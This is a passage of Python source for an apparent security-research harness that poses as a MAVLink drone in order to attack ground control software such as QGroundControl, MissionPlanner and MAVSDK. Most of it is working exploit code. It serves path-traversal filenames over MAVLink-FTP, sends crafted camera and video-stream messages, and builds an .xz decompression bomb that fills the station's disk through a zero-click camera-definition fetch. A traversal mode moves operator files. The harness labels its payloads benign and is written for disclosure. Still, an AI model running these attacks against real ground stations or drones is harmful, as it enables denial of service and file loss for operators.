                    idx = list(self.PARAMS.keys()).index(param_name)
                    self.send_param_value(param_name, self.PARAMS[param_name],
                                          count=len(self.PARAMS), index=idx)
            elif t == "AUTOPILOT_VERSION_REQUEST":
                self.send_autopilot_version()
            elif t == "MISSION_REQUEST_LIST":
                # QGC auto-fetches mission/fence/rally on connect (PlanMasterController).
                # Unanswered, MissionManager retries then raises "Mission transfer
                # failed ... maximum retries exceeded". We carry none of these, so
                # just report an empty list for whichever mission_type was asked.
                mission_type = getattr(msg, "mission_type", 0)
                self.master.mav.mission_count_send(
                    msg.get_srcSystem(), msg.get_srcComponent(), 0, mission_type)
                if self.verbose:
                    observe("GCS requested MISSION_REQUEST_LIST (type=%s) -> replied MISSION_COUNT=0"
                            % mission_type)
            elif t in ("COMMAND_LONG", "COMMAND_INT"):
                c = getattr(msg, "command", None)
                if self.trace:
                    observe("GCS sent %s command=%s" % (t, c))
                if c == mavutil.mavlink.MAV_CMD_REQUEST_AUTOPILOT_CAPABILITIES:
                    self.send_autopilot_version()
                    self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
                elif c == getattr(mavutil.mavlink, "MAV_CMD_REQUEST_MESSAGE", 512) and \
                        int(getattr(msg, "param1", 0)) == mavutil.mavlink.MAVLINK_MSG_ID_AUTOPILOT_VERSION:
                    self.send_autopilot_version()
                    self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
            elif t in ("REQUEST_DATA_STREAM", "MESSAGE_INTERVAL"):
                if self.verbose:
                    observe("GCS requested: %s" % t)
            elif t == "HEARTBEAT":
                pass

    # -- generic raw send for dialect-unknown messages ----------------------
    def _send_raw(self, msgid, name, fields, crc_extra, values):
        """Hand-frame a MAVLink2 packet for a message pymavlink doesn't know."""
        payload = _wire_payload(fields, values)
        # MAVLink2 truncates trailing zero bytes of the payload on the wire.
        trimmed = payload.rstrip(b"\x00")
        if len(trimmed) == 0:
            trimmed = b"\x00"
        with self._seq_lock:
            seq = self.master.mav.seq & 0xFF
            self.master.mav.seq = (self.master.mav.seq + 1) % 256
        hdr = struct.pack("<BBBBBB", len(trimmed), 0, 0, seq, self.sysid, self.compid)
        hdr += struct.pack("<BBB", msgid & 0xFF, (msgid >> 8) & 0xFF, (msgid >> 16) & 0xFF)
        frame = b"\xfd" + hdr + trimmed
        crc = x25crc(frame[1:])
        crc.accumulate(bytes([crc_extra]))
        frame += struct.pack("<H", crc.crc)
        # Write straight to the underlying file/socket (bypasses dialect packer).
        self.master.write(frame)
        if self.verbose:
            attack("sent raw %s (id=%d, %d payload bytes) -> GCS" % (name, msgid, len(trimmed)))

    # ======================================================================
    # Finding-specific payload helpers
    # ======================================================================
    def send_statustext(self, text, severity=mavutil.mavlink.MAV_SEVERITY_INFO):
        """STATUSTEXT — text is char[50]; long strings are chunked by real
        autopilots, but for a PoC marker a single <=50 char chunk is enough."""
        data = text.encode("utf-8", "replace")[:50]
        self.master.mav.statustext_send(severity, data)
        if self.verbose:
            attack("sent STATUSTEXT severity=%d text=%r" % (severity, text))

    def send_autopilot_version(self):
        """AUTOPILOT_VERSION (id 148) -- advertises FTP capability + an
        ArduCopter 4.5.7/Cube Orange identity, matching the MP-01/02/03 PoCs."""
        self.master.mav.autopilot_version_send(
            self.CAPABILITIES, self.FW_VERSION, self.FW_VERSION, 0,
            self.BOARD_VERSION, self.GIT_HASH, self.GIT_HASH, [0] * 8,
            self.VENDOR_ID, self.PRODUCT_ID, self.UID)
        if self.verbose:
            attack("sent AUTOPILOT_VERSION (capabilities=0x%X, fw=0x%X)"
                   % (self.CAPABILITIES, self.FW_VERSION))

    def send_boot_banner(self):
        """A short ArduCopter-style STATUSTEXT boot log, sent once on first
        HEARTBEAT so the vehicle looks like a real ArduPilot boot sequence."""
        for line in self.BOOT_BANNER:
            self.send_statustext(line)

    def send_camera_information(self, vendor_name=b"", model_name=b"",
                                cam_definition_uri=b"", cam_definition_version=1,
                                flags=None):
        """CAMERA_INFORMATION (id 259). vendor_name/model_name are uint8_t[32],
        cam_definition_uri is char[140]. We allow attacker-chosen bytes incl. '../'."""
        if isinstance(vendor_name, str):
            vendor_name = vendor_name.encode("utf-8", "replace")
        if isinstance(model_name, str):
            model_name = model_name.encode("utf-8", "replace")
        if isinstance(cam_definition_uri, str):
            cam_definition_uri = cam_definition_uri.encode("utf-8", "replace")
        # CAMERA_CAP_FLAGS_HAS_VIDEO_STREAM=256 keeps QGC happy; HAS_BASIC etc not needed.
        if flags is None:
            flags = mavutil.mavlink.CAMERA_CAP_FLAGS_HAS_VIDEO_STREAM
        # pymavlink wants list-of-ints for the uint8_t[32] vendor/model arrays.
        v = list((vendor_name + b"\x00" * 32)[:32])
        mdl = list((model_name + b"\x00" * 32)[:32])
        # This dialect build ships the CAMERA_INFORMATION class but not a
        # camera_information_send() helper, so build the message and .send() it.
        from pymavlink.dialects.v20 import ardupilotmega as _M
        msg = _M.MAVLink_camera_information_message(
            int(time.time() * 1000) & 0xFFFFFFFF,  # time_boot_ms
            v, mdl,                                 # vendor_name, model_name (uint8[32])
            0,                                      # firmware_version
            0.0, 0.0, 0.0,                          # focal_length, sensor_size_h/v
            0, 0,                                   # resolution_h/v
            0,                                      # lens_id
            flags,                                  # flags
            cam_definition_version,                 # cam_definition_version
            cam_definition_uri)                     # cam_definition_uri (char[140])
        self.master.mav.send(msg)
        if self.verbose:
            attack("sent CAMERA_INFORMATION vendor=%r model=%r uri=%r"
                   % (vendor_name, model_name, cam_definition_uri))

    def send_video_stream_information(self, uri=b"", name=b"poc", stream_id=1,
                                      count=1, vtype=None):
        """VIDEO_STREAM_INFORMATION (id 269). uri is char[160]; MissionPlanner's
        CameraProtocol passes a uri beginning 'gst://' straight to gst_parse_launch."""
        if isinstance(uri, str):
            uri = uri.encode("utf-8", "replace")
        if isinstance(name, str):
            name = name.encode("utf-8", "replace")
        if vtype is None:
            vtype = mavutil.mavlink.VIDEO_STREAM_TYPE_RTSP
        # No video_stream_information_send() helper in this dialect build; build+send.
        from pymavlink.dialects.v20 import ardupilotmega as _M
        msg = _M.MAVLink_video_stream_information_message(
            stream_id, count, vtype,
            mavutil.mavlink.VIDEO_STREAM_STATUS_FLAGS_RUNNING,  # flags
            30.0,            # framerate
            1280, 720,       # resolution_h/v
            4000,            # bitrate
            0,               # rotation
            90,              # hfov
            name,            # name (char[32])
            uri)             # uri (char[160])
        self.master.mav.send(msg)
        if self.verbose:
            attack("sent VIDEO_STREAM_INFORMATION uri=%r" % uri)

    def send_param_value(self, param_id, value, ptype=None, count=1, index=0):
        """PARAM_VALUE (id 22). param_id is char[16]."""
        if ptype is None:
            ptype = mavutil.mavlink.MAV_PARAM_TYPE_REAL32
        if isinstance(param_id, str):
            param_id = param_id.encode("utf-8", "replace")
        self.master.mav.param_value_send(param_id, float(value), ptype, count, index)
        if self.verbose:
            attack("sent PARAM_VALUE %r=%s" % (param_id, value))

    def send_component_metadata(self, uri, file_crc=0):
        """COMPONENT_METADATA (id 397) — uri char[100]. Dialect-unknown -> raw frame.
        A GCS/MAVSDK fetches this uri (http(s):// over the network, file:// locally)."""
        msgid, name, fields = _MSG_COMPONENT_METADATA
        self._send_raw(msgid, name, fields, 182, {
            "time_boot_ms": int(time.time() * 1000) & 0xFFFFFFFF,
            "file_crc": file_crc & 0xFFFFFFFF,
            "uri": uri,
        })
        if self.verbose:
            attack("sent COMPONENT_METADATA uri=%r" % uri)

    def send_component_information(self, general_uri, peripherals_uri="",
                                   general_crc=0, peripherals_crc=0):
        """COMPONENT_INFORMATION (id 395, deprecated but still consumed by older
        QGC). general_metadata_uri / peripherals_metadata_uri are char[100]."""
        msgid, name, fields = _MSG_COMPONENT_INFORMATION
        self._send_raw(msgid, name, fields, 0, {
            "time_boot_ms": int(time.time() * 1000) & 0xFFFFFFFF,
            "general_metadata_file_crc": general_crc & 0xFFFFFFFF,
            "peripherals_metadata_file_crc": peripherals_crc & 0xFFFFFFFF,
            "general_metadata_uri": general_uri,
            "peripherals_metadata_uri": peripherals_uri,
        })
        if self.verbose:
            attack("sent COMPONENT_INFORMATION general_uri=%r" % general_uri)

    # ======================================================================
    # MAVLink-FTP SERVER
    # ----------------------------------------------------------------------
    # The GCS is the FTP *client*; we are the *server*. We answer ListDirectory,
    # OpenFileRO, ReadFile and the BurstReadFile path with attacker-chosen
    # filenames and contents. Wire format mirrors GCS_FTP.cpp / MAVFtp.cs:
    #   payload[0:2]=seq(LE16) [2]=session [3]=opcode [4]=size [5]=req_opcode
    #   [6]=burst_complete [7]=pad [8:12]=offset(LE32) [12:]=data
    # ======================================================================
    PAYLOAD_LEN = 251
    HDR = 12
    MAX_DATA = PAYLOAD_LEN - HDR        # 239 data bytes
    # opcodes (FTP_OP)
    OP_NONE = 0
    OP_TERMINATE = 1
    OP_RESET = 2
    OP_LIST = 3
    OP_OPEN_RO = 4
    OP_READ = 5
    OP_OPEN_WO = 6
    OP_BURST_READ = 15
    OP_LIST_WITH_TIME = 16   # kCmdListDirectoryWithTime -- newer opcode QGC Daily
                             # probes FIRST on every listDirectory() call (FTPManager.cc);
                             # it only falls back to plain OP_LIST if we NACK this
                             # specific request with ERR_UNKNOWN_COMMAND (see below).
    OP_ACK = 128
    OP_NACK = 129
    # NACK error codes
    ERR_FAIL = 1
    ERR_EOF = 6
    ERR_UNKNOWN_COMMAND = 7
    ERR_FILE_NOT_FOUND = 10

    def add_ftp_file(self, name, content):
        """Register a file the FTP server will serve. `name` may contain traversal
        ('..\\..\\plugins\\evil.cs') or be absolute — that is the whole point."""
        if isinstance(content, str):
            content = content.encode("utf-8")
        self.ftp_files[name] = content

    def add_ftp_dir_entry(self, name, size=None, is_dir=False, mtime=None):
        """Add an entry to what ListDirectory returns. `name` may be a traversal/abs path."""
        if size is None:
            size = len(self.ftp_files.get(name, b""))
        self.ftp_dir_entries.append((name, size, is_dir))
        if not hasattr(self, "ftp_dir_mtimes"):
            self.ftp_dir_mtimes = {}
        if mtime is not None:
            self.ftp_dir_mtimes[name] = int(mtime)

    def _ftp_reply(self, req, opcode, size=0, req_opcode=0, burst=0, offset=0,
                   data=b"", session=None, seq=None):
        p = bytearray(self.PAYLOAD_LEN)
        # ACK seq defaults to req seq + 1. A multi-chunk BurstReadFile MUST
        # increment per chunk: QGC drops any ack whose seqNumber is below
        # _expectedIncomingSeqNumber and advances that after every non-final
        # chunk. Re-using one seq delivers only the first 239 bytes -- invisible
        # on a tiny file, fatal on a multi-megabyte log.
        seq_val = (req["seq"] + 1) if seq is None else seq
        struct.pack_into("<H", p, 0, seq_val & 0xFFFF)
        # OpenFileRO must hand the client a NEW session id in the ACK header; for
        # all other replies we echo the request's session.
        p[2] = (req["session"] if session is None else session) & 0xFF
        p[3] = opcode & 0xFF
        p[4] = size & 0xFF
        p[5] = req_opcode & 0xFF
        p[6] = burst & 0xFF
        struct.pack_into("<I", p, 8, offset & 0xFFFFFFFF)
        d = data[:self.MAX_DATA]
        p[self.HDR:self.HDR + len(d)] = d
        as_comp = req.get("target_comp", self.compid)
        with self._send_lock:
            old = self.master.mav.srcComponent
            self.master.mav.srcComponent = as_comp
            try:
                self.master.mav.file_transfer_protocol_send(
                    0, req["src_sys"], req["src_comp"], list(p))
            finally:
                self.master.mav.srcComponent = old

    def _handle_ftp(self, msg):
        raw = bytes(bytearray(msg.payload))
        req = {
            "seq": struct.unpack_from("<H", raw, 0)[0],
            "session": raw[2],
            "opcode": raw[3],
            "size": raw[4],
            "req_opcode": raw[5],
            "burst": raw[6],
            "offset": struct.unpack_from("<I", raw, 8)[0],
            "data": raw[self.HDR:self.HDR + raw[4]],
            "src_sys": msg.get_srcSystem(),
            "src_comp": msg.get_srcComponent(),
            # FTPManager::_mavlinkMessageReceived drops any reply whose compid is
            # not _ftpCompId -- and _ftpCompId is whichever component the request
            # was addressed to (the camera's 100 for a cam_definition fetch, 1 for
            # @PARAM/param.pck). Reply as that component or the ACK is discarded
            # and the download silently times out.
            "target_comp": getattr(msg, "target_component", self.compid),
        }
        op = req["opcode"]
        if self.trace:
            observe("MAVFTP request: opcode=%d size=%d offset=%d data=%r"
                    % (op, req["size"], req["offset"], req["data"]))

        if op == self.OP_LIST:
            self._ftp_list(req)
        elif op == self.OP_OPEN_RO:
            self._ftp_open_ro(req)
        elif op == self.OP_READ:
            self._ftp_read(req, burst=False)
        elif op == self.OP_BURST_READ:
            self._ftp_read(req, burst=True)
        elif op == self.OP_TERMINATE or op == self.OP_RESET:
            self._ftp_sessions.pop(req["session"], None)
            self._ftp_reply(req, self.OP_ACK, req_opcode=op)
        elif op == self.OP_LIST_WITH_TIME:
            # QGC-04 REQUIRES this opcode to be answered. If we NACK it,
            # FTPManager sets listDirectoryWithTimeUnsupported() and
            # OnboardLogController::_ftpFinishListing() then DISCARDS every entry
            # we just served and falls back to the message-based LOG_ENTRY/LOG_DATA
            # transport (OnboardLogController.cc:1122-1128) -- which this harness
            # does not implement, so the log list renders empty. Answer it with
            # the 3-field form "F<name>\t<size>\t<mtime>".
            self._ftp_list(req, with_time=True)
        else:
            # Any other opcode we don't implement: NACK as "unknown command"
            # (not a generic FAIL) so a client that probes for optional/newer
            # opcodes falls back correctly instead of treating it as a hard error.
            self._ftp_reply(req, self.OP_NACK, size=1, req_opcode=op,
                            data=bytes([self.ERR_UNKNOWN_COMMAND]))

    def _ftp_list(self, req, with_time=False):
        """ListDirectory: each entry is a type byte ('F'/'D'/'S') then a NUL-
        terminated string. For a file MissionPlanner expects 'name\\tsize'
        (MAVFtp.cs:1310-1321 tab-split). We pack as many entries as fit from the
        requested offset; EOF -> NACK(EndOfFile)."""
        offset = req["offset"]
        if offset >= len(self.ftp_dir_entries):
            self._ftp_reply(req, self.OP_NACK, size=1, req_opcode=req["opcode"],
                            data=bytes([self.ERR_EOF]))
            return
        blob = b""
        i = offset
        while i < len(self.ftp_dir_entries):
            name, size, is_dir = self.ftp_dir_entries[i]
            if is_dir:
                entry = b"D" + name.encode("utf-8") + b"\x00"
            else:
                if with_time:
                    # kCmdListDirectoryWithTime: name \t size \t mtime(unix secs UTC)
                    mtime = self.ftp_dir_mtimes.get(name, 0)
                    entry = b"F" + ("%s\t%d\t%d" % (name, size, mtime)).encode("utf-8") + b"\x00"
                else:
                    entry = b"F" + ("%s\t%d" % (name, size)).encode("utf-8") + b"\x00"
            if len(blob) + len(entry) > self.MAX_DATA:
                break
            blob += entry
            i += 1
        self._ftp_reply(req, self.OP_ACK, size=len(blob), req_opcode=req["opcode"],
                        offset=offset, data=blob)
        if self.verbose:
            attack("served MAVFTP ListDirectory: %d entr%s (offset %d) incl. attacker filenames"
                   % (i - offset, "y" if i - offset == 1 else "ies", offset))

    def _resolve_ftp_file(self, path_bytes):
        """Map an OpenFileRO path back to a registered attacker file.

        The GCS requests whatever we advertised in ListDirectory, but prefixed
        with the directory it listed -- e.g. we advertise "00000042.BIN" and QGC
        asks for "@MAV_LOG/00000042.BIN". So the requested path can be LONGER
        than the registered key, and a one-directional endswith() test fails.
        Try, in order: exact, basename-vs-basename, key endswith request,
        request endswith key, then a single-file fallback.
        """
        path = path_bytes.decode("utf-8", "replace").lstrip("/").rstrip("\x00")
        # QGC requests "@PARAM/param.pck?withdefaults=1" -- the query string must
        # not defeat basename matching, or the single-file fallback answers the
        # parameter download with whatever else we happen to be serving.
        if "?" in path:
            path = path.split("?", 1)[0]
        norm = lambda p: p.lstrip("/").replace("\\", "/")
        base = lambda p: norm(p).rsplit("/", 1)[-1]

        if path in self.ftp_files:
            return path, self.ftp_files[path]

        # basename match -- the normal case for a listed directory
        pb = base(path)
        for k, v in self.ftp_files.items():
            if base(k) == pb:
                return k, v

        # either direction of suffix match (traversal names, nested dirs)
        for k, v in self.ftp_files.items():
            if norm(k).endswith(norm(path)) or norm(path).endswith(norm(k)):
                return k, v

        if len(self.ftp_files) == 1:
            k = next(iter(self.ftp_files))
            return k, self.ftp_files[k]

        warn("OpenFileRO for %r matched no registered file (have: %s)"
             % (path, ", ".join(sorted(self.ftp_files))))
        return None, None

    def _ftp_open_ro(self, req):
        name, content = self._resolve_ftp_file(req["data"])
        if content is None:
            self._ftp_reply(req, self.OP_NACK, size=1, req_opcode=self.OP_OPEN_RO,
                            data=bytes([self.ERR_FILE_NOT_FOUND]))
            return
        session = (max(self._ftp_sessions) + 1) if self._ftp_sessions else 1
        self._ftp_sessions[session] = (name, content)
        # ACK header carries the new session id; ACK data = file size (LE32),
        # matching GCS_FTP.cpp OpenFileRO which returns the size in the payload.
        self._ftp_reply(req, self.OP_ACK, size=4, req_opcode=self.OP_OPEN_RO,
                        data=struct.pack("<I", len(content)), session=session)
        if self.verbose:
            attack("served MAVFTP OpenFileRO -> session=%d, %d bytes of attacker content"
                   % (session, len(content)))

    def _ftp_session_lookup(self, req):
        """Resolve the session for a request, tolerantly.

        MAVSDK never picks up the session id we return in the OpenFileRO ack --
        `_session` is only ever written into outgoing payloads (v3.17.4
        mavlink_ftp_client.cpp:427/478/525/713), never assigned from a reply -- so
        it keeps sending session 0. A strict server NAKs that, MAVSDK maps the NAK
        to ProtocolError and gives up. Real autopilot FTP servers are lenient here,
        so we are too: fall back to the only open session when the id does not
        match. (Deviation from the MAVLink FTP spec on MAVSDK's side, not a
        vulnerability -- noted in the write-up.)
        """
        sess = self._ftp_sessions.get(req["session"])
        if sess is None and self._ftp_sessions:
            # Fall back to the MOST RECENT session, not "the only one". Across
            # several connects the dict holds stale sessions, and requiring
            # exactly one silently NAKed every download after the first -- which
            # looked like MAVSDK declining to re-download, and was not.
            sess = self._ftp_sessions[max(self._ftp_sessions)]
        return sess

    def _ftp_read(self, req, burst):
        sess = self._ftp_session_lookup(req)
        if sess is None:
            self._ftp_reply(req, self.OP_NACK, size=1,
                            req_opcode=self.OP_BURST_READ if burst else self.OP_READ,
                            data=bytes([self.ERR_FAIL]))
            return
        _name, content = sess
        offset = req["offset"]
        if offset >= len(content):
            self._ftp_reply(req, self.OP_NACK, size=1,
                            req_opcode=self.OP_BURST_READ if burst else self.OP_READ,
                            data=bytes([self.ERR_EOF]))
            return
        if not burst:
            chunk = content[offset:offset + min(req["size"] or self.MAX_DATA, self.MAX_DATA)]
            self._ftp_reply(req, self.OP_ACK, size=len(chunk), req_opcode=self.OP_READ,
                            offset=offset, data=chunk)
            return
        # Burst path: stream chunks until EOF, marking burst_complete on the last.
        pos = offset
        seq = req["seq"] + 1
        while pos < len(content):
            chunk = content[pos:pos + self.MAX_DATA]
            pos += len(chunk)
            last = pos >= len(content)
            self._ftp_reply(req, self.OP_ACK, size=len(chunk), req_opcode=self.OP_BURST_READ,
                            burst=1 if last else 0, offset=pos - len(chunk), data=chunk,
                            seq=seq)
            seq = (seq + 1) & 0xFFFF
        if self.verbose:
            attack("served MAVFTP BurstReadFile: %d bytes from offset %d" % (len(content) - offset, offset))


# ---------------------------------------------------------------------------
# self-test: confirm the hand-rolled CRC_EXTRA matches known + audited values.
# Run:  python3 fake_vehicle_harness.py --selftest
# ---------------------------------------------------------------------------
def _selftest():
    # CAMERA_INFORMATION (non-extension fields only) must yield the dialect's 92.
    cam = [("uint32_t", "time_boot_ms", 0), ("uint8_t", "vendor_name", 32),
           ("uint8_t", "model_name", 32), ("uint32_t", "firmware_version", 0),
           ("float", "focal_length", 0), ("float", "sensor_size_h", 0),
           ("float", "sensor_size_v", 0), ("uint16_t", "resolution_h", 0),
           ("uint16_t", "resolution_v", 0), ("uint8_t", "lens_id", 0),
           ("uint32_t", "flags", 0), ("uint16_t", "cam_definition_version", 0),
           ("char", "cam_definition_uri", 140)]
    got = _crc_extra("CAMERA_INFORMATION", cam)
    assert got == 92, "CAMERA_INFORMATION crc_extra %d != 92" % got
    assert _crc_extra(*_MSG_COMPONENT_METADATA[1:]) == 182, "COMPONENT_METADATA crc_extra mismatch"
    assert _crc_extra(*_MSG_COMPONENT_INFORMATION[1:]) == 0, "COMPONENT_INFORMATION crc_extra mismatch"
    ok("selftest OK: CRC_EXTRA(CAMERA_INFORMATION)=92, COMPONENT_METADATA=182, COMPONENT_INFORMATION=0")
# ============================== end embedded harness ==============================


# ============================================================================
# MAVSDK-03 specifics
# ============================================================================
import lzma

# A perfectly ordinary camera definition. Used by --mode control to show the app
# working normally, and as the *declared* content of the bomb.
BENIGN_CAM_DEF_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<mavlinkcamera>
  <definition version="1">
    <model>MAVSDK03-BENIGN-MARKER</model>
    <vendor>infected-drones research</vendor>
  </definition>
  <parameters>
    <parameter name="MAVSDK03_MARKER" type="uint32" default="0">
      <description>infected-drones MAVSDK-03 benign marker parameter</description>
    </parameter>
  </parameters>
  <localization/>
</mavlinkcamera>
"""


def build_bomb_xz(output_gib=1, chunk_mib=8, cache_path=None):
    """A .xz stream that decodes to `output_gib` GiB of zeros.

    Compressed with the streaming API so building it costs a few MB of RAM rather
    than a gigabyte. The ratio is ~1:6869 with preset 9|EXTREME, so 1 GiB of output
    is about 153 KB on the wire -- roughly 656 MAVLink-FTP messages.

    Note what this is NOT: an attempt to exhaust memory. A stream declaring a huge
    LZMA dictionary does not make liblzma allocate it (measured: 60-byte input
    declaring 1537 MiB decodes in 1.5 MiB of RSS). The unbounded resource here is
    the OUTPUT SIZE, because inflate_lzma.cpp's write loop has no ceiling.
    """
    if cache_path and os.path.exists(cache_path):
        with open(cache_path, "rb") as fh:
            blob = fh.read()
        ok("  reused cached bomb from %s (%s bytes) -- no rebuild"
           % (cache_path, format(len(blob), ",")))
        return blob

    comp = lzma.LZMACompressor(format=lzma.FORMAT_XZ,
                               preset=9 | lzma.PRESET_EXTREME)
    zeros = b"\x00" * (chunk_mib * 1024 * 1024)
    out = []
    total = output_gib * 1024 // chunk_mib      # number of chunks
    t0 = time.time()
    for i in range(total):
        piece = comp.compress(zeros)
        if piece:
            out.append(piece)
        # Progress matters here: compressing 2 GiB at preset 9|EXTREME takes ~90s,
        # and a silent terminal for that long looks like a hang. Do not start the
        # app until this finishes and the "waiting for the GCS" line appears.
        pct = (i + 1) * 100 // total
        if pct % 10 == 0 and (i + 1) * 100 % total < 100:
            observe("  building ... %3d%%  (%.0fs elapsed)" % (pct, time.time() - t0))
    out.append(comp.flush())
    blob = b"".join(out)
    ok("  build done in %.0fs" % (time.time() - t0))
    if cache_path:
        try:
            tmp = cache_path + ".tmp"
            with open(tmp, "wb") as fh:
                fh.write(blob)
            os.replace(tmp, cache_path)
            observe("  cached to %s for future runs" % cache_path)
        except Exception as e:
            observe("  (could not cache: %s)" % e)
    return blob


class MavsdkCameraVehicle(FakeVehicle):
    """A vehicle that answers MAVSDK's own CAMERA_INFORMATION request.

    MAVSDK asks for CAMERA_INFORMATION on seeing a heartbeat from any component id
    it has not seen before (camera_impl.cpp:1008 -> :1028) -- there is no component
    filter, so the autopilot's own heartbeat is enough. The application never asks
    for anything, which is what makes this zero-click.
    """

    CAMINFO_ID = 259

    def __init__(self, *a, **kw):
        self.cam_uri = kw.pop("cam_uri", "")
        self.cam_model = kw.pop("cam_model", "MAVSDK03")
        self.cam_vendor = kw.pop("cam_vendor", "infected-drones")
        super().__init__(*a, **kw)
        self.answered = 0

    COUNT_FILE = "/work/ftp_count"

    def _note_ftp(self):
        """Readable progress without -v.

        With -v the harness prints 239 bytes of hex per FTP message, which makes
        the vehicle pane unwatchable on camera. This prints a summary line every
        250 chunks instead, and keeps the running total in a file so the watch
        pane can read one small number rather than grepping a growing log.
        """
        self.ftp_reqs = getattr(self, "ftp_reqs", 0) + 1
        self.ftp_bytes = getattr(self, "ftp_bytes", 0)
        try:
            tmp = self.COUNT_FILE + ".tmp"
            with open(tmp, "w") as fh:
                fh.write(str(self.ftp_reqs))
            os.replace(tmp, self.COUNT_FILE)     # atomic: readers never see a truncated file
        except Exception:
            pass
        if self.ftp_reqs % 250 == 0:
            attack("MAVFTP: served %d chunks (~%s bytes on the wire)"
                   % (self.ftp_reqs, format(self.ftp_reqs * 239, ",")))

    def _extra_rx_hook(self, msg, t):
        if t == "FILE_TRANSFER_PROTOCOL":
            self._note_ftp()
            return False          # let the base FTP server handle it
        if t not in ("COMMAND_LONG", "COMMAND_INT"):
            return False
        c = getattr(msg, "command", None)
        REQ = getattr(mavutil.mavlink, "MAV_CMD_REQUEST_MESSAGE", 512)
        REQ_CAMINFO = getattr(
            mavutil.mavlink, "MAV_CMD_REQUEST_CAMERA_INFORMATION", 522)
        want = int(getattr(msg, "param1", 0) or 0)

        # MAVSDK asks with BOTH the generic MAV_CMD_REQUEST_MESSAGE(259) and the
        # deprecated dedicated MAV_CMD_REQUEST_CAMERA_INFORMATION(522). Answering
        # only the first leaves it retrying forever, which is what an earlier
        # version of this harness did.
        wants_caminfo = (c == REQ_CAMINFO) or (c == REQ and want == self.CAMINFO_ID)
        if not wants_caminfo:
            if c == REQ and self.trace:
                observe("MAVSDK requested message id %d -- not camera info" % want)
            return False

        tgt = getattr(msg, "target_component", None)
        observe("MAVSDK requested CAMERA_INFORMATION via cmd=%s (target_component=%s)"
                % (c, tgt))
        observe("  the app never asked for this -- camera_impl.cpp:1028 did")
        self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
        self.send_camera_information(
            vendor_name=self.cam_vendor.encode()[:32],
            model_name=self.cam_model.encode()[:32],
            cam_definition_uri=self.cam_uri.encode(),
            cam_definition_version=1)
        self.answered += 1
        attack("answered CAMERA_INFORMATION #%d cam_definition_uri=%r"
               % (self.answered, self.cam_uri))
        return True


MODES = {
    "control": dict(
        name="def.xml",
        note="serve an ordinary uncompressed camera definition. The app fetches it "
             "over MAVLink-FTP and parses it. Baseline: this is what normal looks like"),
    "bomb": dict(
        name="def.xml.xz",
        note="serve the SAME definition name with a .xz extension. camera_impl.cpp:1477 "
             "sees the extension and hands the file to InflateLZMA, whose write loop "
             "(inflate_lzma.cpp:110-143) has no output ceiling"),
}


def main():
    pre = argparse.ArgumentParser(add_help=False)
    pre.add_argument("--mode", choices=sorted(MODES), default="bomb")
    pre.add_argument("--gib", type=int, default=1,
                     help="GiB of output the bomb should decode to (default 1)")
    pre.add_argument("--ftp-name", default=None, metavar="NAME",
                     help="override the definition filename used in BOTH the "
                          "cam_definition_uri and the MAVLink-FTP key. Use a "
                          "'../'-bearing NAME to exercise MAVSDK-02's traversal: "
                          "the FTP client writes the basename into the temp dir "
                          "(mavlink_ftp_client.cpp:410) while camera_impl.cpp:1474 "
                          "rebuilds the RAW path -- the mismatch is the bug.")
    pre.add_argument("--corrupt-tail", type=int, default=0, metavar="N",
                     help="truncate N bytes off the end of the .xz. The decode "
                          "still writes nearly all the output, then fails -- and "
                          "inflate_lzma.cpp never unlinks the partial file, nor "
                          "does the camera_impl.cpp:1483 error branch. Tests "
                          "whether a failed decompress escapes the 50-entry cache.")
    pre.add_argument("--bomb-cache", default=None, metavar="PATH",
                     help="reuse a previously built .xz from PATH (and write it "
                          "there on first build). Building 2 GiB at preset "
                          "9|EXTREME takes ~60s; this makes repeat runs instant.")
    pre.add_argument("--model", default="MAVSDK03",
                     help="CAMERA_INFORMATION.model_name. Part of the cache key "
                          "(camera_impl.cpp:1494), so varying it creates a NEW cache "
                          "entry instead of reusing one -- that is the 50x multiplier.")
    pre.add_argument("--vendor", default="infected-drones",
                     help="CAMERA_INFORMATION.vendor_name; also part of the cache key")
    args, rest = pre.parse_known_args()

    # `--help` belongs to the second parser (FakeVehicle.from_cli), which runs
    # AFTER the bomb is built. Without this, asking for help spends a minute
    # compressing a payload and then exits.
    if any(a in ("-h", "--help") for a in rest):
        pre.print_help()
        print()
        sys.argv = [sys.argv[0], "--help"]
        FakeVehicle.from_cli("MAVSDK-03 camera definition bomb")
        return 0
    m = MODES[args.mode]

    # The same harness drives two findings: they share the cam_definition_uri
    # field and the mftp:// sink, and differ only in what the URI names. A
    # '..'-bearing name is MAVSDK-02's traversal; a '.xz' name is MAVSDK-03's
    # decompression bomb. Say which one is on screen so a recording is not
    # captioned with the wrong finding.
    traversal = ".." in (args.ftp_name or "")
    if traversal:
        banner("MAVSDK-02: cam_definition_uri traversal -> the GCS deletes its own file")
        warn("BENIGN PoC: this MOVES one operator file into MAVSDK's cache. Nothing is")
        warn("executed and nothing is overwritten. Use a file you can afford to lose.")
        observe("target: MAVSDK v3.17.4 (shipped libmavsdk-dev debian12 arm64 package)")
        observe("sink: mavlink_ftp_client.cpp:410 writes the BASENAME into the temp dir, "
                "but camera_impl.cpp:1474 rebuilds the RAW path. FileCache::insert then "
                "renames THAT path into the cache -- deleting it from where it lived")
    else:
        banner("MAVSDK-03: camera definition .xz -> unbounded decompression on the GCS")
        warn("BENIGN PoC: the decompressed output is zeros, written into the app's own")
        warn("temp directory. Nothing is executed. Delete that directory afterwards.")
        observe("target: MAVSDK v3.17.4 (shipped libmavsdk-dev debian12 arm64 package)")
        observe("mode=%s -- %s" % (args.mode, m["note"]))

    if args.mode == "bomb":
        observe("building a .xz that decodes to %d GiB ..." % args.gib)
        blob = build_bomb_xz(output_gib=args.gib,
                             cache_path=args.bomb_cache)
        if args.corrupt_tail:
            n = args.corrupt_tail
            blob = blob[:-n]
            warn("truncated %d bytes off the .xz tail -- the decode will write "
                 "almost all of the output and THEN fail" % n)
            observe("  on failure camera_impl.cpp:1483 logs and returns without "
                    "removing the partial .extracted file, and")
            observe("  inflate_lzma.cpp:285-291 closes the output without unlinking "
                    "it -- so it never reaches _file_cache->insert()")
        ratio = (args.gib * 1024 * 1024 * 1024) // max(1, len(blob))
        ok("bomb is %s bytes on the wire -> %d GiB decompressed (ratio 1:%d)"
           % (format(len(blob), ","), args.gib, ratio))
        observe("that is ~%d MAVLink-FTP messages of 239 bytes"
            % (len(blob) // 239 + 1))
        served = blob
